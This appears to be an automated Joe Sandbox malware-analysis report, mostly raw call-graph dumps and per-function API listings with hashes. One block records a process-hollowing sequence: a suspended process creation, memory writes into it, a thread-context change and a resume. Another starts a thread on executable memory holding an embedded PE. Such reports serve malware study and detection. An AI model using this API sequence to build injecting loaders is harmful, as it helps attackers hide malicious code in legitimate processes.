4ea61a __freea 14 API calls 15955->15957 15958 4e25bb 15955->15958 15956 4ea61a __freea 14 API calls 15956->15955 15957->15958 15959 4ea61a __freea 14 API calls 15958->15959 15961 4e25cc 15958->15961 15959->15961 15960 4e25dd 15962 4e25ee 15960->15962 15964 4ea61a __freea 14 API calls 15960->15964 15961->15960 15963 4ea61a __freea 14 API calls 15961->15963 15965 4e25ff 15962->15965 15966 4ea61a __freea 14 API calls 15962->15966 15963->15960 15964->15962 15967 4e3a44 std::_Lockit::~_Lockit 2 API calls 15965->15967 15966->15965 15968 4e260a 15967->15968 15968->15921 15983 4ea94c 15969->15983 15972 4e3b27 _Yarn 15 API calls 15973 4e3cf1 15972->15973 15974 4e3d01 15973->15974 15975 4ea94c std::_Locinfo::_Locinfo_dtor 69 API calls 15973->15975 15976 4e3b27 _Yarn 15 API calls 15974->15976 15975->15974 15977 4e3d15 15976->15977 15977->15945 16022 4e1f49 15978->16022 15981 4e5842 Concurrency::cancel_current_task RaiseException 15982 4e1fd4 15981->15982 15984 4ef4db std::_Locinfo::_Locinfo_dtor 5 API calls 15983->15984 15985 4ea959 15984->15985 15988 4ea6f7 15985->15988 15989 4ea703 __FrameHandler3::FrameUnwindToState 15988->15989 15996 4ea676 EnterCriticalSection 15989->15996 15991 4ea711 15997 4ea752 15991->15997 15996->15991 15998 4ea8b1 std::_Locinfo::_Locinfo_dtor 69 API calls 15997->15998 15999 4ea76d 15998->15999 16000 4eea50 __Getctype 41 API calls 15999->16000 16017 4ea71e 15999->16017 16001 4ea77a 16000->16001 16002 4f247c std::_Locinfo::_Locinfo_dtor 43 API calls 16001->16002 16003 4ea79f 16002->16003 16004 4ea7a6 16003->16004 16005 4f1dc1 __fread_nolock 15 API calls 16003->16005 16007 4e8efc __Getctype 11 API calls 16004->16007 16004->16017 16006 4ea7cb 16005->16006 16009 4f247c std::_Locinfo::_Locinfo_dtor 43 API calls 16006->16009 16006->16017 16008 4ea8b0 16007->16008 16010 4ea7e7 16009->16010 16011 4ea7ee 16010->16011 16012 4ea809 16010->16012 16011->16004 16013 4ea800 16011->16013 16014 4eed98 ___free_lconv_mon 14 API calls 16012->16014 16016 4ea834 16012->16016 16015 4eed98 ___free_lconv_mon 14 API calls 16013->16015 16014->16016 16015->16017 16016->16017 16018 4eed98 ___free_lconv_mon 14 API calls 16016->16018 16019 4ea746 16017->16019 16018->16017 16020 4ea6be std::_Lockit::~_Lockit LeaveCriticalSection 16019->16020 16021 4e3cd9 16020->16021 16021->15972 16023 4e17b6 std::exception::exception 42 API calls 16022->16023 16024 4e1f5b 16023->16024 16024->15981 16037 4eaae4 16025->16037 16027 4e3deb __Getctype 16028 4e3e05 16027->16028 16029 4e3e23 16027->16029 16042 4ea984 16028->16042 16031 4ea984 __Getctype 41 API calls 16029->16031 16032 4e3e0c 16031->16032 16047 4eab09 16032->16047 16035 4e233e 16035->15925 16038 4eea50 __Getctype 41 API calls 16037->16038 16039 4eaaef 16038->16039 16040 4f24ba __Getctype 41 API calls 16039->16040 16041 4eaaff 16040->16041 16041->16027 16043 4eea50 __Getctype 41 API calls 16042->16043 16044 4ea98f 16043->16044 16045 4f24ba __Getctype 41 API calls 16044->16045 16046 4ea99f 16045->16046 16046->16032 16048 4eea50 __Getctype 41 API calls 16047->16048 16049 4eab14 16048->16049 16050 4f24ba __Getctype 41 API calls 16049->16050 16051 4e3e34 16050->16051 16051->16035 16052 4eaf98 16051->16052 16053 4eafa5 16052->16053 16054 4eafe0 16052->16054 16053->16053 16055 4ea6ec _Yarn 15 API calls 16053->16055 16054->16035 16056 4eafc8 16055->16056 16056->16054 16061 4f2c18 16056->16061 16059 4e8efc __Getctype 11 API calls 16060 4eaff6 16059->16060 16062 4f2c34 16061->16062 16063 4f2c26 16061->16063 16064 4eb0d8 __dosmaperr 14 API calls 16062->16064 16063->16062 16068 4f2c4e 16063->16068 16065 4f2c3e 16064->16065 16066 4e8ecf __strnicoll 41 API calls 16065->16066 16067 4eafd9 16066->16067 16067->16054 16067->16059 16068->16067 16069 4eb0d8 __dosmaperr 14 API calls 16068->16069 16069->16065 16071 4e3d24 16070->16071 16072 4e2599 16070->16072 16073 4ea94c std::_Locinfo::_Locinfo_dtor 69 API calls 16071->16073 16072->15955 16072->15956 16073->16072 17504 4ee917 17505 4ee932 17504->17505 17506 4ee922 17504->17506 17510 4ee938 17506->17510 17509 4eed98 ___free_lconv_mon 14 API calls 17509->17505 17511 4ee94d 17510->17511 17512 4ee953 17510->17512 17514 4eed98 ___free_lconv_mon 14 API calls 17511->17514 17513 4eed98 ___free_lconv_mon 14 API calls 17512->17513 17515 4ee95f 17513->17515 17514->17512 17516 4eed98 ___free_lconv_mon 14 API calls 17515->17516 17517 4ee96a 17516->17517 17518 4eed98 ___free_lconv_mon 14 API calls 17517->17518 17519 4ee975 17518->17519 17520 4eed98 ___free_lconv_mon 14 API calls 17519->17520 17521 4ee980 17520->17521 17522 4eed98 ___free_lconv_mon 14 API calls 17521->17522 17523 4ee98b 17522->17523 17524 4eed98 ___free_lconv_mon 14 API calls 17523->17524 17525 4ee996 17524->17525 17526 4eed98 ___free_lconv_mon 14 API calls 17525->17526 17527 4ee9a1 17526->17527 17528 4eed98 ___free_lconv_mon 14 API calls 17527->17528 17529 4ee9ac 17528->17529 17530 4eed98 ___free_lconv_mon 14 API calls 17529->17530 17531 4ee9ba 17530->17531 17536 4ee764 17531->17536 17537 4ee770 __FrameHandler3::FrameUnwindToState 17536->17537 17552 4ea676 EnterCriticalSection 17537->17552 17541 4ee77a 17542 4eed98 ___free_lconv_mon 14 API calls 17541->17542 17543 4ee7a4 17541->17543 17542->17543 17553 4ee7c3 17543->17553 17544 4ee7cf 17545 4ee7db __FrameHandler3::FrameUnwindToState 17544->17545 17557 4ea676 EnterCriticalSection 17545->17557 17547 4ee7e5 17548 4eea05 __dosmaperr 14 API calls 17547->17548 17549 4ee7f8 17548->17549 17558 4ee818 17549->17558 17552->17541 17556 4ea6be LeaveCriticalSection 17553->17556 17555 4ee7b1 17555->17544 17556->17555 17557->17547 17561 4ea6be LeaveCriticalSection 17558->17561 17560 4ee806 17560->17509 17561->17560 14909 4e4684 14910 4e4e80 GetModuleHandleW 14909->14910 14911 4e468c 14910->14911 14912 4e46c2 14911->14912 14913 4e4690 14911->14913 14915 4ec1ee __FrameHandler3::FrameUnwindToState 23 API calls 14912->14915 14914 4e469b 14913->14914 14918 4ec1d0 14913->14918 14917 4e46ca 14915->14917 14919 4ec012 __FrameHandler3::FrameUnwindToState 23 API calls 14918->14919 14920 4ec1db 14919->14920 14920->14914 16662 4e9094 16663 4e95ae ___scrt_uninitialize_crt 70 API calls 16662->16663 16664 4e909c 16663->16664 16672 4ef55c 16664->16672 16666 4e90a1 16682 4ef607 16666->16682 16669 4e90cb 16670 4eed98 ___free_lconv_mon 14 API calls 16669->16670 16671 4e90d6 16670->16671 16673 4ef568 __FrameHandler3::FrameUnwindToState 16672->16673 16686 4ea676 EnterCriticalSection 16673->16686 16675 4ef5df 16693 4ef5fe 16675->16693 16676 4ef573 16676->16675 16678 4ef5b3 DeleteCriticalSection 16676->16678 16687 4e9273 16676->16687 16681 4eed98 ___free_lconv_mon 14 API calls 16678->16681 16681->16676 16683 4ef61e 16682->16683 16684 4e90b0 DeleteCriticalSection 16682->16684 16683->16684 16685 4eed98 ___free_lconv_mon 14 API calls 16683->16685 16684->16666 16684->16669 16685->16684 16686->16676 16688 4e9286 _Fputc 16687->16688 16696 4e914e 16688->16696 16690 4e9292 16691 4e8c0b _Fputc 41 API calls 16690->16691 16692 4e929e 16691->16692 16692->16676 16768 4ea6be LeaveCriticalSection 16693->16768 16695 4ef5eb 16695->16666 16697 4e915a __FrameHandler3::FrameUnwindToState 16696->16697 16698 4e9187 16697->16698 16699 4e9164 16697->16699 16706 4e917f 16698->16706 16707 4e9126 EnterCriticalSection 16698->16707 16700 4e8e52 _Fputc 29 API calls 16699->16700 16700->16706 16702 4e91a5 16708 4e91e5 16702->16708 16704 4e91b2 16722 4e91dd 16704->16722 16706->16690 16707->16702 16709 4e9215 16708->16709 16710 4e91f2 16708->16710 16712 4e94e0 ___scrt_uninitialize_crt 66 API calls 16709->16712 16720 4e920d 16709->16720 16711 4e8e52 _Fputc 29 API calls 16710->16711 16711->16720 16713 4e922d 16712->16713 16714 4ef607 14 API calls 16713->16714 16715 4e9235 16714->16715 16716 4ef839 __fread_nolock 41 API calls 16715->16716 16717 4e9241 16716->16717 16725 4ef8f1 16717->16725 16720->16704 16721 4eed98 ___free_lconv_mon 14 API calls 16721->16720 16767 4e913a LeaveCriticalSection 16722->16767 16724 4e91e3 16724->16706 16726 4ef91a 16725->16726 16731 4e9248 16725->16731 16727 4ef969 16726->16727 16729 4ef941 16726->16729 16728 4e8e52 _Fputc 29 API calls 16727->16728 16728->16731 16732 4ef860 16729->16732 16731->16720 16731->16721 16733 4ef86c __FrameHandler3::FrameUnwindToState 16732->16733 16740 4f554d EnterCriticalSection 16733->16740 16735 4ef87a 16736 4ef8ab 16735->16736 16741 4ef994 16735->16741 16754 4ef8e5 16736->16754 16740->16735 16742 4f5624 __fread_nolock 41 API calls 16741->16742 16744 4ef9a4 16742->16744 16743 4ef9aa 16757 4f5593 16743->16757 16744->16743 16746 4f5624 __fread_nolock 41 API calls 16744->16746 16753 4ef9dc 16744->16753 16748 4ef9d3 16746->16748 16747 4f5624 __fread_nolock 41 API calls 16749 4ef9e8 CloseHandle 16747->16749 16750 4f5624 __fread_nolock 41 API calls 16748->16750 16749->16743 16751 4ef9f4 GetLastError 16749->16751 16750->16753 16751->16743 16752 4efa02 __fread_nolock 16752->16736 16753->16743 16753->16747 16766 4f5570 LeaveCriticalSection 16754->16766 16756 4ef8ce 16756->16731 16758 4f5609 16757->16758 16759 4f55a2 16757->16759 16760 4eb0d8 __dosmaperr 14 API calls 16758->16760 16759->16758 16765 4f55cc 16759->16765 16761 4f560e 16760->16761 16762 4eb0c5 __dosmaperr 14 API calls 16761->16762 16763 4f55f9 16762->16763 16763->16752 16764 4f55f3 SetStdHandle 16764->16763 16765->16763 16765->16764 16766->16756 16767->16724 16768->16695 17911 4ef7ad 17912 4ef7b9 __FrameHandler3::FrameUnwindToState 17911->17912 17923 4ea676 EnterCriticalSection 17912->17923 17914 4ef7c0 17924 4f54af 17914->17924 17922 4ef7de 17948 4ef804 17922->17948 17923->17914 17925 4f54bb __FrameHandler3::FrameUnwindToState 17924->17925 17926 4f54e5 17925->17926 17927 4f54c4 17925->17927 17951 4ea676 EnterCriticalSection 17926->17951 17928 4eb0d8 __dosmaperr 14 API calls 17927->17928 17930 4f54c9 17928->17930 17932 4e8ecf __strnicoll 41 API calls 17930->17932 17931 4f54f1 17934 4f551d 17931->17934 17952 4f53ff 17931->17952 17933 4ef7cf 17932->17933 17933->17922 17937 4ef647 GetStartupInfoW 17933->17937 17959 4f5544 17934->17959 17938 4ef6f8 17937->17938 17939 4ef664 17937->17939 17943 4ef6fd 17938->17943 17939->17938 17940 4f54af 42 API calls 17939->17940 17941 4ef68c 17940->17941 17941->17938 17942 4ef6bc GetFileType 17941->17942 17942->17941 17944 4ef704 17943->17944 17945 4ef747 GetStdHandle 17944->17945 17946 4ef7a9 17944->17946 17947 4ef75a GetFileType 17944->17947 17945->17944 17946->17922 17947->17944 17963 4ea6be LeaveCriticalSection 17948->17963 17950 4ef7ef 17951->17931 17953 4eed3b __dosmaperr 14 API calls 17952->17953 17955 4f5411 17953->17955 17954 4f541e 17956 4eed98 ___free_lconv_mon 14 API calls 17954->17956 17955->17954 17957 4ef380 6 API calls 17955->17957 17958 4f5473 17956->17958 17957->17955 17958->17931 17962 4ea6be LeaveCriticalSection 17959->17962 17961 4f554b 17961->17933 17962->17961 17963->17950 14921 4f4ca4 14922 4f4cad 14921->14922 14923 4f4cdf 14921->14923 14924 4eeb0b 41 API calls 14922->14924 14925 4f4cd0 14924->14925 14926 4f4aaf 52 API calls 14925->14926 14926->14923

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C402FC
                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00C4030F
                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00C4032D
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C40351
                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00C4037C
                                  • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00C403D4
                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00C4041F
                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C4045D
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C40499
                                  • ResumeThread.KERNELBASE(?), ref: 00C404A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2181235760.0000000000C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c40000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                  • String ID: GetP$Load$aryA$ress
                                  • API String ID: 2687962208-977067982
                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                  • Instruction ID: 49ecbdcd13c0b8f8d31f0baba31c277a032ca4f124ddc8e1482bfe0f1fe5557e
                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                  • Instruction Fuzzy Hash: D2B1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA1CAB341D774FA418B94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 370 4f53ce-4f53e6 GetPEB 371 4f53e8-4f53ec call 4ef0f6 370->371 372 4f53f7-4f53f9 370->372 375 4f53f1-4f53f5 371->375 374 4f53fa-4f53fe 372->374 375->372 375->374
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
                                  • Instruction ID: f5bf238da5adb0dafe320b6e3794dec4dc475f1d7106cc4c0b6b51acc62a3a36
                                  • Opcode Fuzzy Hash: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
                                  • Instruction Fuzzy Hash: D7E08C32911228EBCB18DB8EC90499AF3ECEB44B44B1140ABFA01D3201C2B4DE00CBD4
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
                                  • Instruction ID: 78654487bf36cb5a41a69c4abf16c8c9bc482fb79d7dc62028747f462c131ef4
                                  • Opcode Fuzzy Hash: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
                                  • Instruction Fuzzy Hash: 3AC08C34000E8087CE2A891986B13B673A4A3927CBFC0159ECA424BB83C51E9C83EB48

                                  Control-flow Graph

                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,004FC2E6), ref: 004FC20B
                                    • Part of subcall function 004FC151: _Deallocate.LIBCONCRT ref: 004FC1EC
                                  • CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 004FC23F
                                  • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,004FC2E6), ref: 004FC24B
                                  • CloseHandle.KERNEL32(00000000,?,?,004FC2E6), ref: 004FC252
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: AllocCloseCreateDeallocateHandleObjectSingleThreadVirtualWait
                                  • String ID: 0*U$MZx$ole
                                  • API String ID: 440434604-2269876306
                                  • Opcode ID: 643c543c2d3fd6374fe667f4d54054173245f9a2b4ce8cb04b9da01c39d146f9
                                  • Instruction ID: 719f860f4201df7fb94c0a4470175f641cdc0c8bb4a888db5e78bf5ce9e33590
                                  • Opcode Fuzzy Hash: 643c543c2d3fd6374fe667f4d54054173245f9a2b4ce8cb04b9da01c39d146f9
                                  • Instruction Fuzzy Hash: 3DF0827660111C7FD12023639C8DEBB3A5CDB477EEF410125FB05951818E192C1286BD

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 30 4eefa8-4eefb4 31 4ef046-4ef049 30->31 32 4ef04f 31->32 33 4eefb9-4eefca 31->33 34 4ef051-4ef055 32->34 35 4eefcc-4eefcf 33->35 36 4eefd7-4eeff0 LoadLibraryExW 33->36 37 4ef06f-4ef071 35->37 38 4eefd5 35->38 39 4ef056-4ef066 36->39 40 4eeff2-4eeffb GetLastError 36->40 37->34 42 4ef043 38->42 39->37 41 4ef068-4ef069 FreeLibrary 39->41 43 4eeffd-4ef00f call 4ee6d8 40->43 44 4ef034-4ef041 40->44 41->37 42->31 43->44 47 4ef011-4ef023 call 4ee6d8 43->47 44->42 47->44 50 4ef025-4ef032 LoadLibraryExW 47->50 50->39 50->44
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,F4A61D19,?,004EF0B5,?,?,00000000,00000000), ref: 004EF069
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3664257935-537541572
                                  • Opcode ID: c0f5cbefcfd508e6069c8fc7a160a3e4f3e89a522c2bd84012edb82e0e03c99c
                                  • Instruction ID: d071e10a6e703b7110e06f07e50cd5d5406c37539c6c071e0a5196a723010175
                                  • Opcode Fuzzy Hash: c0f5cbefcfd508e6069c8fc7a160a3e4f3e89a522c2bd84012edb82e0e03c99c
                                  • Instruction Fuzzy Hash: 2E212B31E01290ABC7319723DC44A6B3759DF51376F200132E915AB392EB38ED05C6D9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 51 4f29e1-4f29fa 52 4f29fc-4f2a0c call 4eb29b 51->52 53 4f2a10-4f2a15 51->53 52->53 60 4f2a0e 52->60 55 4f2a17-4f2a21 53->55 56 4f2a24-4f2a4a call 4f3b78 53->56 55->56 61 4f2bbd-4f2bce call 4e4713 56->61 62 4f2a50-4f2a5b 56->62 60->53 63 4f2a61-4f2a66 62->63 64 4f2bb0 62->64 66 4f2a7b-4f2a86 call 4f1dc1 63->66 67 4f2a68-4f2a71 call 4e4a60 63->67 68 4f2bb2 64->68 77 4f2a91-4f2a95 66->77 78 4f2a88 66->78 76 4f2a73-4f2a79 67->76 67->77 72 4f2bb4-4f2bbb call 4e4466 68->72 72->61 80 4f2a8e 76->80 77->68 81 4f2a9b-4f2ab2 call 4f3b78 77->81 78->80 80->77 81->68 84 4f2ab8-4f2aca call 4ef442 81->84 86 4f2acf-4f2ad3 84->86 87 4f2aee-4f2af0 86->87 88 4f2ad5-4f2add 86->88 87->68 89 4f2adf-4f2ae4 88->89 90 4f2b17-4f2b23 88->90 91 4f2aea-4f2aec 89->91 92 4f2b96-4f2b98 89->92 93 4f2b25-4f2b27 90->93 94 4f2ba2 90->94 91->87 96 4f2af5-4f2b0f call 4ef442 91->96 92->72 97 4f2b3c-4f2b47 call 4f1dc1 93->97 98 4f2b29-4f2b32 call 4e4a60 93->98 95 4f2ba4-4f2bab call 4e4466 94->95 95->87 96->92 109 4f2b15 96->109 97->95 108 4f2b49 97->108 98->95 107 4f2b34-4f2b3a 98->107 110 4f2b4f-4f2b54 107->110 108->110 109->87 110->95 111 4f2b56-4f2b6e call 4ef442 110->111 111->95 114 4f2b70-4f2b77 111->114 115 4f2b9a-4f2ba0 114->115 116 4f2b79-4f2b7a 114->116 117 4f2b7b-4f2b8d call 4f3bf4 115->117 116->117 117->95 120 4f2b8f-4f2b95 call 4e4466 117->120 120->92
                                  APIs
                                  • __alloca_probe_16.LIBCMT ref: 004F2A68
                                  • __alloca_probe_16.LIBCMT ref: 004F2B29
                                  • __freea.LIBCMT ref: 004F2B90
                                    • Part of subcall function 004F1DC1: HeapAlloc.KERNEL32(00000000,004E1FA6,?,?,004E57EA,?,?,?,00000000,?,004E17E2,004E1FA6,?,?,?,?), ref: 004F1DF3
                                  • __freea.LIBCMT ref: 004F2BA5
                                  • __freea.LIBCMT ref: 004F2BB5
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                  • String ID:
                                  • API String ID: 1096550386-0
                                  • Opcode ID: d307ddaa44551018599d53ccbba3637ee2577585d95bda1304620684fe3a3106
                                  • Instruction ID: b3ebd4b7c2b096ae065eddc97ba3cdd022f870cd78f4f5198b854875c48acd20
                                  • Opcode Fuzzy Hash: d307ddaa44551018599d53ccbba3637ee2577585d95bda1304620684fe3a3106
                                  • Instruction Fuzzy Hash: 8551067260021EAFEF249F62CE41EBB37A8EF44314B14056AFE04E7240E7B8DD108769

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,?,004EC0A3,00000000,004E8CD2,?,?,F4A61D19,004E8CD2,?), ref: 004EC0BA
                                  • TerminateProcess.KERNEL32(00000000,?,004EC0A3,00000000,004E8CD2,?,?,F4A61D19,004E8CD2,?), ref: 004EC0C1
                                  • ExitProcess.KERNEL32 ref: 004EC0D3
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 3aebf73ef7382cfd5aaa383b364cf4b9f30b03ceef74c1ddbaf69186ef60b3b4
                                  • Instruction ID: 536db7fd72f4dc03ad15db7357933b4a7bf11051f0b0ef34991229f9de44e131
                                  • Opcode Fuzzy Hash: 3aebf73ef7382cfd5aaa383b364cf4b9f30b03ceef74c1ddbaf69186ef60b3b4
                                  • Instruction Fuzzy Hash: 8DD06771400544AFCB113F66ED4D9697F26AF4038AF044165B9498A132CF3A9963DA88

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 130 4f4cff-4f4d27 call 4f482f 133 4f4eef-4f4ef0 call 4f48a0 130->133 134 4f4d2d-4f4d33 130->134 137 4f4ef5-4f4ef7 133->137 136 4f4d36-4f4d3c 134->136 138 4f4e3e-4f4e5d call 4e5e60 136->138 139 4f4d42-4f4d4e 136->139 141 4f4ef8-4f4f06 call 4e4713 137->141 148 4f4e60-4f4e65 138->148 139->136 142 4f4d50-4f4d56 139->142 143 4f4d5c-4f4d68 IsValidCodePage 142->143 144 4f4e36-4f4e39 142->144 143->144 147 4f4d6e-4f4d75 143->147 144->141 150 4f4d9d-4f4daa GetCPInfo 147->150 151 4f4d77-4f4d83 147->151 152 4f4e67-4f4e6c 148->152 153 4f4ea2-4f4eac 148->153 156 4f4dac-4f4dcb call 4e5e60 150->156 157 4f4e2a-4f4e30 150->157 154 4f4d87-4f4d93 call 4f4903 151->154 158 4f4e9f 152->158 159 4f4e6e-4f4e76 152->159 153->148 155 4f4eae-4f4ed8 call 4f47f1 153->155 165 4f4d98 154->165 169 4f4ed9-4f4ee8 155->169 156->154 170 4f4dcd-4f4dd4 156->170 157->133 157->144 158->153 163 4f4e78-4f4e7b 159->163 164 4f4e97-4f4e9d 159->164 168 4f4e7d-4f4e83 163->168 164->152 164->158 165->137 168->164 171 4f4e85-4f4e95 168->171 169->169 172 4f4eea 169->172 173 4f4dd6-4f4ddb 170->173 174 4f4e00-4f4e03 170->174 171->164 171->168 172->133 173->174 176 4f4ddd-4f4de5 173->176 175 4f4e08-4f4e0f 174->175 175->175 177 4f4e11-4f4e25 call 4f47f1 175->177 178 4f4df8-4f4dfe 176->178 179 4f4de7-4f4dee 176->179 177->154 178->173 178->174 181 4f4def-4f4df6 179->181 181->178 181->181
                                  APIs
                                    • Part of subcall function 004F482F: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 004F485A
                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,004F4B46,?,00000000,?,00000000,?), ref: 004F4D60
                                  • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,004F4B46,?,00000000,?,00000000,?), ref: 004F4DA2
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: CodeInfoPageValid
                                  • String ID:
                                  • API String ID: 546120528-0
                                  • Opcode ID: e14504b0b31b793bb4a31330bd1bd75779d4f2d380c92be4b9d160339a94d1d0
